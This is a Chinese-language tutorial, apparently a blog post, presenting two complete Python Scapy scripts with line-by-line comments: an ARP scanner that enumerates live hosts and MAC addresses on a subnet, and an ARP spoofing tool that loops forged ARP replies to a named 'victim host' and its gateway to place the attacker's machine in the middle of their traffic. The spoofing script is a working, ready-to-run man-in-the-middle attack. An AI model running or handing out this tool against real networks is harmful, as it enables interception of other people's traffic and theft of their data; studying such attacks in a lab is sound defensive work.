Python Scapy库实现ARP扫描和ARP欺骗
ARP扫描:检测指定IP网段中哪些主机是在线的,并获取它们的MAC地址
from scapy.all import *
import argparse
import threading
import time
import logging
# 解析CIDR格式的网段,并返回IP地址列表
# >接受一个CIDR格式的网段作为输入(例如192.168.1.0/24)。
# >将网段解析为IP地址列表。
# >通过子网掩码长度计算IP地址范围,并生成该网段内所有可能的IP地址。
def Parse_IP(targets):
"""
将CIDR格式的网段字符串转换为IP地址列表。
:param targets: CIDR格式的网段字符串,例如"192.168.1.1/24"
:return: IP地址列表
"""
_split = targets.split('/') # 按斜杠分割字符串,得到网络地址和子网掩码长度
first_ip = _split[0] # 获取网络地址
ip_split = first_ip.split('.') # 按点分割网络地址,得到各部分的数字
# 生成IP地址范围
ipv4 = range(int(ip_split[3]), int(ip_split[3]) + (2 ** (32 - int(_split[1]))))
# 构建IP地址列表
addr = [f"{ip_split[0]}.{ip_split[1]}.{ip_split[2]}.{p}" for p in ipv4]
return addr
# 使用ARP协议扫描指定IP地址,查找在线设备
# >接受一个IP地址作为输入。
# >使用Scapy发送一个ARP请求到这个IP地址,并等待回复
# >如果收到ARP回复,则提取并打印出该IP地址对应的MAC地址
def ARP_Scan(address):
"""
发送ARP请求到指定IP地址,并查找在线设备的MAC地址。
:param address: 要扫描的IP地址
"""
try:
# 发送ARP请求并等待回复,超时时间为5秒
ret = sr1(ARP(pdst=address), timeout=5, verbose=False)
# 如果收到回复
if ret:
# 检查回复是否包含ARP层,并且操作码是否为2(表示ARP回复)
if ret.haslayer('ARP') and ret.fields['op'] == 2:
# 打印IP地址和对应的MAC地址
print('[+] IP地址: %-13s ==> MAC地址: %-15s' %(ret.fields['psrc'], ret.fields['hwsrc']))
except Exception as e:
logging.error(f"An error occurred while scanning IP {address}: {e}")
exit(1)
# 程序入口
# >argparse模块解析命令行参数
# >如果提供了扫描网段参数,则调用Parse_IP函数解析网段,获取IP地址列表
# >每个IP地址创建一个新的线程来执行ARP_Scan函数
if __name__ == "__main__":
# 设置Scapy的日志记录级别为ERROR,以减少不必要的输出
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
# 创建命令行参数解析器
parser = argparse.ArgumentParser()
parser.add_argument("-s", "--scan", dest="scan", help="输入一个扫描网段")
# 解析命令行参数
args = parser.parse_args()
# 如果提供了扫描网段参数
if args.scan:
# 解析网段并获取IP地址列表
addr_list = Parse_IP(args.scan)
# 创建线程列表
threads = []
# 对每个IP地址启动一个新的扫描线程
for item in addr_list:
t = threading.Thread(target=ARP_Scan, args=(item,))
threads.append(t)
t.start()
# 等待所有线程完成
for item in threads:
item.join()
else:
parser.print_help()ARP欺骗:通过伪造ARP响应来欺骗目标计算机和网关,使它们相信它们正在与对方通信,而实际上所有的通信都经过了攻击者的机器
from scapy.all import *
import argparse
import threading, time
import logging
# 定义SendPayload函数,用于发送ARP欺骗的数据包
def SendPayload(Interface, srcMac, tgtMac, gateWayMac, gatewayIP, tgtIP):
# 打印目标MAC地址和目标IP地址,以及发送的数据包数量
print("[+] 目标MAC: {} 目标IP: {} 发送: 2 packets".format(tgtMac, tgtIP))
# 生成并发送第一个ARP数据包,伪造网关的IP和MAC地址,欺骗目标计算机
# 使目标计算机认为网关的MAC地址是攻击者的MAC地址
sendp(
Ether(src=srcMac, dst=tgtMac) / # 以攻击者的MAC地址作为源MAC,目标计算机的MAC地址作为目的MAC
ARP(hwsrc=srcMac, psrc=gatewayIP, hwdst=tgtMac, pdst=tgtIP, op=2), # ARP数据包,其中op=2表示ARP回复
iface=Interface
)
# 生成并发送第二个ARP数据包,伪造目标计算机的IP和MAC地址,欺骗网关
# 使网关认为目标计算机的MAC地址是攻击者的MAC地址
sendp(
Ether(src=srcMac, dst=gateWayMac) / # 以攻击者的MAC地址作为源MAC,网关的MAC地址作为目的MAC
ARP(hwsrc=srcMac, psrc=tgtIP, hwdst=gateWayMac, pdst=gatewayIP, op=2),
iface=Interface
)
if __name__ == "__main__":
# 创建命令行参数解析器
parser = argparse.ArgumentParser()
# 接口名
parser.add_argument("-i", "--interface", dest="interface", help="输入接口名")
# 网关地址
parser.add_argument("-g", "--gateway", dest="gateway", help="输入网关地址")
# 目标主机地址
parser.add_argument("-t", "--target", dest="target", help="输入被害主机地址")
# 解析命令行参数
args = parser.parse_args()
if args.gateway and args.target:
# 通过接口名称获取本机的MAC地址
srcMac = get_if_hwaddr(args.interface)
# 通过目标主机的IP地址获取其MAC地址
tgtMac = getmacbyip(args.target)
# 通过网关的IP地址获取其MAC地址
gatewayMac = getmacbyip(args.gateway)
# 持续发送ARP欺骗数据包
while True:
# 创建一个新线程来发送ARP欺骗数据包
t = threading.Thread(target=SendPayload, args=(args.interface, srcMac, tgtMac, gatewayMac, args.gateway, args.target))
t.start()
t.join()
time.sleep(1)
else:
parser.print_help()